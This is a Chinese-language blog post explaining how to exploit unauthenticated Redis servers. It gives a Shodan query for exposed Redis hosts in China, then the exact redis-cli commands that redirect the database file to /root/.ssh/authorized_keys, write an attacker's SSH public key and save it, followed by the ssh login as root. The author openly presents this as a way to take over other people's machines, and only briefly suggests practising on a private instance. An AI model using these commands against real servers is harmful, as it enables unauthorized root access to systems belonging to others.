Bboysoul's Blog

首页 公告 RSS

redis未经授权访问漏洞利用

May 15, 2020 本文有 618 个字 需要花费 2 分钟阅读

简介

上次介绍了一个kong的未经授权访问漏洞,那个漏洞不能直接入侵到宿主机,所以今天继续介绍个未经授权访问漏洞

redis如果你没有设置过密码的话,默认是没有密码所有人都可以直接连接的,所以你可以利用这个特点去抓鸡

寻找目标

和上次一样,我们这次还是使用shadon来寻找目标主机,登陆shadon然后搜索

redis port:"6379" country:"CN"

之后找可以看到版本的主机,不要找类似于下面的

-DENIED Redis is running in protected mode because protected mode is enabled, no bind address was specified, no authentication password is requested to clients. In this mode connections are only accepted from the loopback interface. If you want to connect from external computers to Redis you may ...

连接

如果你本地不想安装redis客户端的话可以这么做

docker run -it redis bash

docker真的是个好东西

之后使用cli连接

redis-cli -h ip

之后输入ping查看是不是可以正常连接

ping

注入ssh公钥提权

这个时候你是可以访问redis了,但是不能访问宿主机,所以我们下面就是为了访问宿主机

生成ssh秘钥

apt update && apt install ssh

ssh-keygen

一直回车

接着查看公钥

cat ~/.ssh/id_rsa.pub

然后修改数据库存放目录

config set dir /root/.ssh/

设置数据库数据库文件名

config set dbfilename authorized_keys

之后设置一条数据写入公钥

set x "\n\n\nssh-rsa ...公钥...root@33dsd14d90988\n\n\n"

写入数

save

如果显示

(error) ERR

说明不是使用root启动的redis或者不能往/root/.ssh/中写入文件

如果显示ok,那么你就成功了

之后就是直接ssh到这台主机中

ssh root@ip

如果你成功了,就说明可以了,当然,因为这个漏洞出现了太久,很多主机都会失败的,所以最好自己搭建一个redis玩玩

欢迎关注我的博客www.bboy.app

Have Fun


Tags:

本站总访问量 本站总访客数